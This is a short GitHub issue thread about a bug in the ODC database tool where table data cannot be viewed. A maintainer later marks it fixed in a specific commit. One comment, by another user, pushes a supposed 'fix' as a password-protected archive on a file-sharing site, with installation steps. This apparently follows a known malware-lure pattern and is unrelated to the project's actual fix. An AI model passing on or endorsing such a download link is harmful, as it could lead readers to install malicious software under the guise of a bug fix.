### ISSUE TITLE
[Bug]: Unable to view table data

### ISSUE THREAD

**Issue by Huangxiao-mas** [oceanbase/odc#3213]
### ODC version

ODC432

### OB version

independent

### What happened?

Unable to view table data
![image](https://github.com/user-attachments/assets/2c103ccc-42b4-4bb4-a0b0-0d174701a791)

### What did you expect to happen?

。

### How can we reproduce it (as minimally and precisely as possible)?

。

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by HSunboy** [comment]
Fixed In Commit [0dc21b8a3304a1e5d9aa77869a05b1fbd80e377e](https://github.com/oceanbase/odc-client/commit/0dc21b8a3304a1e5d9aa77869a05b1fbd80e377e)
            ------
            畅晚
            Tue Aug 27 17:47:24 2024 +0800
